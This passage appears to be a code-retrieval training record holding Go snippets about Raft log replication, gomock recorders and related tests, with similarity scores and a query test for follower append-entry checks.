args.PrevLogTerm = rf.log[rf.nextIndex[id]-1].Term\n args.PrevLogIndex = rf.nextIndex[id]-1\n args.LeaderTerm = rf.currentTerm\n args.LeaderCommitIndex = rf.commitIndex\n \n go func(serverId int) {\n var reply AppendEntriesReply\n ok:=rf.sendAppendEntries(serverId, &args, &reply)\n if !rf.CheckTerm(reply.CurrentTerm) {\n localMu.Lock()\n isLeader=false\n localMu.Unlock()\n } else if reply.Success && ok {\n localMu.Lock()\n successReplyCount++\n receivedResponse = append(receivedResponse,serverId)\n localMu.Unlock()\n rf.mu.Lock()\n if lastLogIndex >= rf.nextIndex[id] {\n rf.matchIndex[id]= lastLogIndex\n rf.nextIndex[id] = lastLogIndex + 1\n }\n rf.mu.Unlock()\n } else {\n rf.mu.Lock()\n rf.nextIndex[id]-- \n rf.mu.Unlock()\n }\n } (id)\n }\n }\n \n fmt.Printf(\"\\nsleeping before counting success replies\\n\")\n time.Sleep(time.Duration(RANDOM_TIMER_MIN*time.Millisecond))\n\n if !committed && isLeader {\n votesForIndex := 0\n N := math.MaxInt32\n rf.mu.Lock()\n for i := 0; i < numPeers; i++ {\n if rf.matchIndex[i] > rf.commitIndex {\n if rf.matchIndex[i] < N {\n N = rf.matchIndex[i]\n }\n votesForIndex++\n }\n }\n rf.mu.Unlock()\n\n\n if (votesForIndex > (numPeers/2)){ \n go func(){\n committed = true\n rf.mu.Lock()\n rf.commitIndex = N // Discuss: 3. should we use lock?\n rf.log[N].Term = rf.currentTerm\n if rf.commitIndex >= lastLogIndex {\n var oneApplyMsg ApplyMsg\n oneApplyMsg.CommandValid = true\n oneApplyMsg.CommandIndex = lastLogIndex\n oneApplyMsg.Command = command\n go func() {rf.applyCh <- oneApplyMsg} ()\n }\n rf.mu.Unlock()\n }()\n }\n } else if successReplyCount == numPeers {\n return\n } \n }\n } ()\n \n // Your code here (2B code).\n return lastLogIndex, term, isLeader\n}", "func (mr *MockFullNodeMockRecorder) VerifyEntry(arg0, arg1, arg2 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"VerifyEntry\", reflect.TypeOf((*MockFullNode)(nil).VerifyEntry), arg0, arg1, arg2)\n}", "func (l *channelLink) updateCommitTx() error {\n\ttheirCommitSig, htlcSigs, err := l.channel.SignNextCommitment()\n\tif err == lnwallet.ErrNoWindow {\n\t\tlog.Tracef(\"revocation window exhausted, unable to send %v\",\n\t\t\tl.batchCounter)\n\t\treturn nil\n\t} else if err != nil {\n\t\treturn err\n\t}\n\n\tcommitSig := &lnwire.CommitSig{\n\t\tChanID: l.ChanID(),\n\t\tCommitSig: theirCommitSig,\n\t\tHtlcSigs: htlcSigs,\n\t}\n\tl.cfg.Peer.SendMessage(commitSig)\n\n\t// We've just initiated a state transition, attempt to stop the\n\t// logCommitTimer. If the timer already ticked, then we'll consume the\n\t// value, dropping\n\tif l.logCommitTimer != nil && !l.logCommitTimer.Stop() {\n\t\tselect {\n\t\tcase <-l.logCommitTimer.C:\n\t\tdefault:\n\t\t}\n\t}\n\tl.logCommitTick = nil\n\n\t// Finally, clear our the current batch, so we can accurately make\n\t// further batch flushing decisions.\n\tl.batchCounter = 0\n\n\treturn nil\n}", "func (r *MockRepoManager) mockChildCommit(hash string) {\n\tr.mtx.Lock()\n\tdefer r.mtx.Unlock()\n\tif r.mockFullChildHashes == nil {\n\t\tr.mockFullChildHashes = map[string]string{}\n\t}\n\tif r.rolledPast == nil {\n\t\tr.rolledPast = map[string]bool{}\n\t}\n\tassert.Equal(r.t, 40, len(hash))\n\tshortHash := hash[:12]\n\tr.skiaHead = hash\n\tr.mockFullChildHashes[shortHash] = hash\n\tr.rolledPast[hash] = false\n}", "func (_RandomBeacon *RandomBeaconTransactorSession) SubmitRelayEntry(entry []byte, groupMembers []uint32) (*types.Transaction, error) {\n\treturn _RandomBeacon.Contract.SubmitRelayEntry(&_RandomBeacon.TransactOpts, entry, groupMembers)\n}", "func TestFileEntryDetail(t *testing.T) {\n\ted := mockEntryDetail()\n\ted.TransactionCode = 0\n\tline := ed.String()\n\tr := NewReader(strings.NewReader(line))\n\tr.addCurrentBatch(NewBatchPPD())\n\tr.currentBatch.SetHeader(mockBatchHeader())\n\t_, err := r.Read()\n\tif p, ok := err.(*ParseError); ok {\n\t\tif e, ok := p.Err.(*FieldError); ok {\n\t\t\tif e.Msg != msgFieldInclusion {\n\t\t\t\tt.Errorf(\"%T: %s\", e, e)\n\t\t\t}\n\t\t}\n\t} else {\n\t\tt.Errorf(\"%T: %s\", err, err)\n\t}\n}", "func TestLeaderTransferWithCheckQuorum(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tfor i := 1; i < 4; i++ {\n\t\tr := nt.peers[uint64(i)].(*raft)\n\t\tr.checkQuorum = true\n\t\tsetRandomizedElectionTimeout(r, r.electionTimeout+i)\n\t}\n\n\t// Letting peer 2 electionElapsed reach to timeout so that it can vote for peer 1\n\tf := nt.peers[2].(*raft)\n\tfor i := 0; i < f.electionTimeout; i++ {\n\t\tf.tick()\n\t}\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (m *MockServiceEntryReconcileLoop) RunServiceEntryReconciler(ctx context.Context, rec controller.ServiceEntryReconciler, predicates ...predicate.Predicate) error {\n\tm.ctrl.T.Helper()\n\tvarargs := []interface{}{ctx, rec}\n\tfor _, a := range predicates {\n\t\tvarargs = append(varargs, a)\n\t}\n\tret := m.ctrl.Call(m, \"RunServiceEntryReconciler\", varargs...)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (m *Member) AppendEntry(leader string, term uint64, value int64, prevLogID int64) (bool, error) {\n\tlog.Infoln(\"Requesting log entry of\", m.Name, \"Value\", value)\n\tvar conn *grpc.ClientConn\n\tconn, err := grpc.Dial(m.Address(), grpc.WithInsecure())\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\tdefer conn.Close()\n\tapi := raftapi.NewRaftServiceClient(conn)\n\tctx := context.Background()\n\tresponse, err := api.AppendEntry(ctx, &raftapi.AppendEntryRequest{\n\t\tTerm: term,\n\t\tLeader: leader,\n\t\tPrevLogId: prevLogID,\n\t\tPrevLogTerm: term,\n\t\tEntry: &raftapi.LogEntry{\n\t\t\tTerm: term,\n\t\t\tValue: value,\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\n\treturn response.Success, nil\n}", "func (mr *MockGormUnitOfWorkIfaceMockRecorder) Commit(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"Commit\", reflect.TypeOf((*MockGormUnitOfWorkIface)(nil).Commit), arg0)\n}" ]
[ "0.7963243", "0.7106544", "0.64706445", "0.637154", "0.62599796", "0.6237348", "0.6076704", "0.60045826", "0.58949214", "0.58655334", "0.5726599", "0.56900215", "0.5676556", "0.5592769", "0.5567174", "0.5552651", "0.5539082", "0.5505763", "0.5505618", "0.54969454", "0.5466882", "0.5426832", "0.5424888", "0.5371652", "0.5364654", "0.53554803", "0.53444004", "0.5326409", "0.53116995", "0.53076226", "0.52885854", "0.5240191", "0.5237319", "0.52288985", "0.52175474", "0.52140784", "0.5206543", "0.5198188", "0.5179687", "0.51736075", "0.513146", "0.5124952", "0.5114796", "0.5113181", "0.51059145", "0.51047677", "0.50648016", "0.5058047", "0.50256354", "0.50229114", "0.5022473", "0.5019061", "0.5007692", "0.50041664", "0.50020087", "0.4998033", "0.49860084", "0.49778396", "0.49739408", "0.49653998", "0.49615043", "0.49560016", "0.49513882", "0.4947371", "0.4941164", "0.49366486", "0.49359703", "0.4932398", "0.49268964", "0.4924577", "0.4886761", "0.48771134", "0.4876264", "0.48751366", "0.48742434", "0.4869716", "0.48694962", "0.4858454", "0.48547977", "0.48536804", "0.48531926", "0.4852802", "0.48484486", "0.48324326", "0.4831418", "0.4815939", "0.48141548", "0.48096743", "0.47953662", "0.47875598", "0.47822013", "0.47733667", "0.4772516", "0.477241", "0.47620738", "0.4752265", "0.47501034", "0.4748735", "0.47474277", "0.47396022" ]
0.85471386
0
TestFollowerCheckMsgApp tests that if the follower does not find an entry in its log with the same index and term as the one in AppendEntries RPC, then it refuses the new entries. Otherwise it replies that it accepts the append entries. Reference: section 5.3
func TestFollowerCheckMsgApp(t *testing.T) { ents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}} tests := []struct { term uint64 index uint64 windex uint64 wreject bool wrejectHint uint64 }{ // match with committed entries {0, 0, 1, false, 0}, {ents[0].Term, ents[0].Index, 1, false, 0}, // match with uncommitted entries {ents[1].Term, ents[1].Index, 2, false, 0}, // unmatch with existing entry {ents[0].Term, ents[1].Index, ents[1].Index, true, 2}, // unexisting entry {ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2}, } for i, tt := range tests { storage := NewMemoryStorage() storage.Append(ents) r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage) defer closeAndFreeRaft(r) r.loadState(pb.HardState{Commit: 1}) r.becomeFollower(2, 2) r.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, To: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index}) msgs := r.readMessages() wmsgs := []pb.Message{ {From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1}, To: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Type: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint}, } if !reflect.DeepEqual(msgs, wmsgs) { t.Errorf("#%d: msgs = %+v, want %+v", i, msgs, wmsgs) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func (handler *RuleHandler) FollowerOnAppendEntries(msg iface.MsgAppendEntries, log iface.RaftLog, status iface.Status) []interface{} {\n\tactions := make([]interface{}, 0) // list of actions created\n\t// since we are hearing from the leader, reset timeout\n\tactions = append(actions, iface.ActionResetTimer{\n\t\tHalfTime: false,\n\t})\n\tactions = append(actions, iface.ActionSetLeaderLastHeard{\n\t\tInstant: time.Now(),\n\t})\n\n\t// maybe we are outdated\n\tif msg.Term > status.CurrentTerm() {\n\t\tactions = append(actions, iface.ActionSetCurrentTerm{\n\t\t\tNewCurrentTerm: msg.Term,\n\t\t})\n\t}\n\n\tprevEntry, _ := log.Get(msg.PrevLogIndex)\n\n\t// leader is outdated ?\n\tif msg.Term < status.CurrentTerm() {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I dont have previous log entry (but should)\n\tif prevEntry == nil && msg.PrevLogIndex != -1 {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I have previous log entry, but it does not match\n\tif prevEntry != nil && prevEntry.Term != msg.PrevLogTerm {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// all is ok. accept new entries\n\tactions = append(actions, iface.ReplyAppendEntries{\n\t\tAddress: status.NodeAddress(),\n\t\tSuccess: true,\n\t\tTerm: status.CurrentTerm(),\n\t})\n\n\t// if there is anything to append, do it\n\tif len(msg.Entries) > 0 {\n\t\t// delete all entries in log after PrevLogIndex\n\t\tactions = append(actions, iface.ActionDeleteLog{\n\t\t\tCount: log.LastIndex() - msg.PrevLogIndex,\n\t\t})\n\n\t\t// take care ! Maybe we are removing an entry\n\t\t// containing our current cluster configuration.\n\t\t// In this case, revert to previous cluster\n\t\t// configuration\n\t\tcontainsClusterChange := false\n\t\tstabilized := false\n\t\tclusterChangeIndex := status.ClusterChangeIndex()\n\t\tclusterChangeTerm := status.ClusterChangeTerm()\n\t\tcluster := append(status.PeerAddresses(), status.NodeAddress())\n\t\tfor !stabilized {\n\t\t\tstabilized = true\n\t\t\tif clusterChangeIndex > msg.PrevLogIndex {\n\t\t\t\tstabilized = false\n\t\t\t\tcontainsClusterChange = true\n\t\t\t\tentry, _ := log.Get(clusterChangeIndex)\n\t\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\t\tjson.Unmarshal(entry.Command, &record)\n\t\t\t\tclusterChangeIndex = record.OldClusterChangeIndex\n\t\t\t\tclusterChangeTerm = record.OldClusterChangeTerm\n\t\t\t\tcluster = record.OldCluster\n\t\t\t}\n\t\t}\n\n\t\t// if deletion detected, rewind to previous configuration\n\t\tif containsClusterChange {\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: clusterChangeIndex,\n\t\t\t\tNewClusterChangeTerm: clusterChangeTerm,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range cluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t}\n\n\t\t// append all entries sent by leader\n\t\tactions = append(actions, iface.ActionAppendLog{\n\t\t\tEntries: msg.Entries,\n\t\t})\n\n\t\t// once again, take care ! Maybe we are adding some entry\n\t\t// describing a cluster change. In such a case, we must apply\n\t\t// the new cluster configuration to ourselves (specifically,\n\t\t// the last cluster configuration among the new entries)\n\t\tfor index := len(msg.Entries) - 1; index >= 0; index-- {\n\t\t\tif msg.Entries[index].Kind != iface.EntryAddServer &&\n\t\t\t\tmsg.Entries[index].Kind != iface.EntryRemoveServer {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\tjson.Unmarshal(msg.Entries[index].Command, &record)\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: msg.PrevLogIndex + int64(index+1),\n\t\t\t\tNewClusterChangeTerm: msg.Entries[index].Term,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range record.NewCluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t\tbreak\n\t\t}\n\n\t}\n\n\t// if leader has committed more than we know, update our index\n\t// and demand state-machine application\n\tif msg.LeaderCommitIndex > status.CommitIndex() {\n\t\tactions = append(actions, iface.ActionSetCommitIndex{\n\t\t\tNewCommitIndex: int64(math.Min(\n\t\t\t\tfloat64(msg.LeaderCommitIndex),\n\t\t\t\tfloat64(msg.PrevLogIndex+int64(len(msg.Entries))),\n\t\t\t)),\n\t\t})\n\t\t// order the state machine to apply the new committed entries\n\t\t// (only if they are state machine commands)\n\t\t// TODO: Treat configuration change\n\t\tfor index := status.CommitIndex() + 1; index < msg.LeaderCommitIndex; index++ {\n\t\t\tvar entry *iface.LogEntry\n\n\t\t\t// get from my log\n\t\t\tif index <= msg.PrevLogIndex {\n\t\t\t\tentry, _ = log.Get(index)\n\n\t\t\t\t// get from leader\n\t\t\t} else {\n\t\t\t\tentry = &msg.Entries[index-msg.PrevLogIndex-1]\n\t\t\t}\n\n\t\t\tswitch entry.Kind {\n\t\t\tcase iface.EntryStateMachineCommand:\n\t\t\t\tactions = append(actions, iface.ActionStateMachineApply{\n\t\t\t\t\tEntryIndex: index,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t}\n\n\treturn actions\n}", "func handleAppendEntries(s *Sailor, state *storage.State, am *appendMessage, leaderId string) (appendReply, error) {\n\t// Check if the node needs to convert to the follower state\n\tif (s.state != follower && am.Term == s.currentTerm) || am.Term > s.currentTerm {\n\t\ts.becomeFollower(am.Term)\n\t}\n\n\trep := appendReply{Term: s.currentTerm, Success: false}\n\t// Reject the RPC if it has the wrong term\n\tif s.currentTerm > am.Term {\n\t\treturn rep, nil\n\t}\n\ts.timer.Reset(new_time()) // The message is from the leader, reset our election-start clock\n\ts.leaderId = leaderId\n\t// Reject the RPC if the position or the term is wrong\n\tif am.PrevLogIndex != 0 && (len(s.log) <= int(am.PrevLogIndex-1) ||\n\t\t(len(s.log) > 0 && s.log[am.PrevLogIndex-1].Term != am.PrevLogTerm)) {\n\t\treturn rep, nil\n\t}\n\n\trep.Success = true // The RPC is valid and the call will succeed\n\n\trep.PrepLower = am.PrevLogIndex + 1\n\trep.ComLower = s.volatile.commitIndex\n\n\t// Loop over the values we're dropping from our log. If we were the leader when\n\t// the values were proposed, then we reply to the client with a set failed message.\n\t// We know we were the leader if we were counting votes for that log entry.\n\tfor i := am.PrevLogIndex; i < uint(len(s.log)); i++ {\n\t\tif s.log[i].votes != 0 {\n\t\t\tfail := messages.Message{}\n\t\t\tfail.Source = s.client.NodeName\n\t\t\tfail.Type = \"setResponse\"\n\t\t\tfail.Error = \"SET FAILED\"\n\t\t\tfail.ID = s.log[i].Id\n\t\t\tfail.Key = s.log[i].Trans.Key\n\t\t\ts.client.SendToBroker(fail)\n\t\t}\n\t}\n\t// Drops the extra entries and adds the new ones\n\ts.log = append(s.log[:am.PrevLogIndex], am.Entries...)\n\t// If we have new values to commit\n\tif am.LeaderCommit > s.volatile.commitIndex {\n\t\t// Choose the min of our log size and the leader's commit index\n\t\tif int(am.LeaderCommit) <= len(s.log) {\n\t\t\ts.volatile.commitIndex = am.LeaderCommit\n\t\t} else {\n\t\t\ts.volatile.commitIndex = uint(len(s.log))\n\t\t}\n\t\t// Actually commit and apply the transactions to the state machine\n\t\tfor s.volatile.lastApplied < s.volatile.commitIndex {\n\t\t\ts.volatile.lastApplied += 1\n\t\t\tstate.ApplyTransaction(s.log[s.volatile.lastApplied-1].Trans)\n\t\t}\n\n\t}\n\trep.PrepUpper = uint(len(s.log))\n\trep.ComUpper = s.volatile.commitIndex\n\treturn rep, nil\n}", "func TestLeaderSyncFollowerLog(t *testing.T) {\n\tents := []pb.Entry{\n\t\t{},\n\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t}\n\tterm := uint64(8)\n\ttests := [][]pb.Entry{\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10}, {Term: 6, Index: 11},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5},\n\t\t\t{Term: 5, Index: 6}, {Term: 5, Index: 7},\n\t\t\t{Term: 6, Index: 8}, {Term: 6, Index: 9}, {Term: 6, Index: 10},\n\t\t\t{Term: 7, Index: 11}, {Term: 7, Index: 12},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 4, Index: 4}, {Term: 4, Index: 5}, {Term: 4, Index: 6}, {Term: 4, Index: 7},\n\t\t},\n\t\t{\n\t\t\t{},\n\t\t\t{Term: 1, Index: 1}, {Term: 1, Index: 2}, {Term: 1, Index: 3},\n\t\t\t{Term: 2, Index: 4}, {Term: 2, Index: 5}, {Term: 2, Index: 6},\n\t\t\t{Term: 3, Index: 7}, {Term: 3, Index: 8}, {Term: 3, Index: 9}, {Term: 3, Index: 10}, {Term: 3, Index: 11},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tleadStorage := NewMemoryStorage()\n\t\tdefer leadStorage.Close()\n\t\tleadStorage.Append(ents)\n\t\tlead := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, leadStorage)\n\t\tlead.loadState(pb.HardState{Commit: lead.raftLog.lastIndex(), Term: term})\n\t\tfollowerStorage := NewMemoryStorage()\n\t\tdefer followerStorage.Close()\n\t\tfollowerStorage.Append(tt)\n\t\tfollower := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, followerStorage)\n\t\tfollower.loadState(pb.HardState{Term: term - 1})\n\t\t// It is necessary to have a three-node cluster.\n\t\t// The second may have more up-to-date log than the first one, so the\n\t\t// first node needs the vote from the third node to become the leader.\n\t\tn := newNetwork(lead, follower, nopStepper)\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\t// The election occurs in the term after the one we loaded with\n\t\t// lead.loadState above.\n\t\tn.send(pb.Message{From: 3, To: 1, Type: pb.MsgVoteResp, Term: term + 1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func (handler *RuleHandler) FollowerOnAppendEntriesReply(msg iface.MsgAppendEntriesReply, log iface.RaftLog, status iface.Status) []interface{} {\n\t// delayed append entries reply. ignore it\n\treturn []interface{}{}\n}", "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func (rf *Raft) heartbeatAppendEntries() {\n\t// make server -> reply map\n\treplies := make([]*AppendEntriesReply, len(rf.peers))\n\tfor servIdx := range rf.peers {\n\t\treplies[servIdx] = &AppendEntriesReply{}\n\t}\n\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\n\t\t// if we are no longer the leader\n\t\tif rf.state != Leader {\n\t\t\trf.Log(LogDebug, \"Discovered no longer the leader, stopping heartbeat\")\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t\t// send out heartbeats concurrently if leader\n\t\tfor servIdx := range rf.peers {\n\t\t\tif servIdx != rf.me {\n\n\t\t\t\t// successful request - update matchindex and nextindex accordingly\n\t\t\t\tif replies[servIdx].Success {\n\t\t\t\t\tif replies[servIdx].HighestLogIndexAdded > 0 {\n\t\t\t\t\t\trf.matchIndex[servIdx] = replies[servIdx].HighestLogIndexAdded\n\t\t\t\t\t}\n\t\t\t\t\trf.nextIndex[servIdx] = rf.matchIndex[servIdx] + 1\n\n\t\t\t\t\t// failed request - check for better term or decrease nextIndex\n\t\t\t\t} else if !replies[servIdx].Success && replies[servIdx].Returned {\n\n\t\t\t\t\t// we might have found out we shouldn't be the leader!\n\t\t\t\t\tif replies[servIdx].CurrentTerm > rf.currentTerm {\n\t\t\t\t\t\trf.Log(LogDebug, \"Detected server with higher term, stopping heartbeat and changing to follower.\")\n\t\t\t\t\t\trf.state = Follower\n\t\t\t\t\t\trf.currentTerm = replies[servIdx].CurrentTerm\n\n\t\t\t\t\t\t// persist - updated current term\n\t\t\t\t\t\tdata := rf.GetStateBytes(false)\n\t\t\t\t\t\trf.persister.SaveRaftState(data)\n\n\t\t\t\t\t\tgo rf.heartbeatTimeoutCheck()\n\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\n\t\t\t\t\t// failure - we need to decrease next index\n\t\t\t\t\t// 1. case where follower has no entry at the place we thought\n\t\t\t\t\t// => want to back up to start of follower log\n\t\t\t\t\t// 2. case where server has entry with different term NOT seen by leader\n\t\t\t\t\t// => want to back up nextIndex to the start of the 'run' of entries with that term (i.e. IndexFirstConflictingTerm)\n\t\t\t\t\t// 3. case where server has entry with different term that HAS been seen by leader\n\t\t\t\t\t// => want to back up to last entry leader has with that term\n\t\t\t\t\t//\n\t\t\t\t\t// Note for 2 and 3 ... if leader does not have the relevant 